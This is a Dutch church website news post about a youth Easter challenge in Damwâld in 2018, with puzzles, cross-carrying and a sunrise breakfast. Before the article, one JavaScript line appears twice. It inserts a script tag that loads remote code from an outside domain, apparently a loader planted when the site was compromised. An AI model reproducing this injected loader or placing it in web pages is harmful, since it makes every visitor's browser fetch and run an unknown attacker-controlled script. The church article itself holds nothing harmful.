;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Jongeren beleven paasverhaal tijdens PaasChallenge - PKN Damwâld

Jongeren beleven paasverhaal tijdens PaasChallenge

Gepubliceerd op: woensdag 4 april 2018

De nacht voor pasen…. Iedereen ligt lekker op bed te slapen, bijna iedereen, In totaal zijn z’n 2000 jongeren door heel Nederland op de been om het Paas Mysterie op te lossen! Ook wij Als kerk(en) deden mee!

27 Jongeren verdeeld in twee groepen gingen na het laatste avondmaal in het skulplak op weg. Gewapend met een telefoon en coordinaten gingen we door heel Damwald naar verschillende adressen om ingewikkelde puzzels op te lossen. Onderweg was “de politie” actief waarvoor de groepen moesten vluchten op niet opgepakt te worden. Uiteindelijk werden we, net als Jezus, toch opgepakt en mochten we nadenken over de lasten die wij meedragen en de dingen waar wij op hopen. Bij de kerk waren verschillende gemeenteleden aanwezig om bij een lekker warm kampvuur te praten over verschillende onderwerpen die passen bij de lijdensweg van Jezus en Pasen!

Het een zware opdracht om zo snel mogelijk 6 kg hout per persoon te verplaatsen was het tijd voor misschien wel het bijzonderste van de avond, het dragen van 5 meter groot kruis door Damwald! Net als bij de Passion mochten de groepen om de buurt het kruis dragen, Vele vonden dit best zwaar maar wel een hele ervaring. Halverwege de tocht werd het kruis neergelegd op te luisteren naar “Via Dolorosa” van Sela, iedereen was stil en luisterde, een hele bijzondere ervaring!

Na het kruis dragen was het tijd voor het zoeken naar de paas schat! Met een aantal scheppen werd enthousiast gegraven naar de schat. Maar helaas, deze was er niet, Jezus is aan het kruis gehangen en gestorven, de hoop voor de wereld is weg, Er is niets meer te vieren, dus al helemaal geen schat…. De graafplaats werden door de groepen verlaten en we gingen, met verbazing op weg naar de eindlocatie, net buiten Damwald op de zonsopkomst te bekijken. Toen werd alles duidelijk, het was Pasen, Jezus is opgestaan uit de dood, Hij is gestorven voor onze lasten, (de brieven die de jongeren hebben achtergelaten in de gegraven gaten), zodat wij deze niet meer hoeven te dragen, wij zijn gered door zijn Dood en door Zijn opstanding mogen wij weten dat er hoop is voor ons, zolang wij maar bij Jezus komen!

Na de ontknoping stond er een heerlijk paasontbijt klaar in een lekker warm zaal! Daar was iedereen aan toe, want hoe mooi het avontuur ook was, zwaar en koud was het soms wel… Na het ontbijt sluitte Wiebe het ontbijt af met mooi verhaal over de boodschap van Pasen! De ouders stonden klaar om de vermoeide jongeren weer op te vangen om lekker naar huis te gaan, lekker op bed en lekker slapen 🙂

Gelukkig is er een mooie “aftermovie” gemaakt van de PaasChallenge zodat iedereen kan meegenieten van het avontuur wat de jongeren beleeft hebben!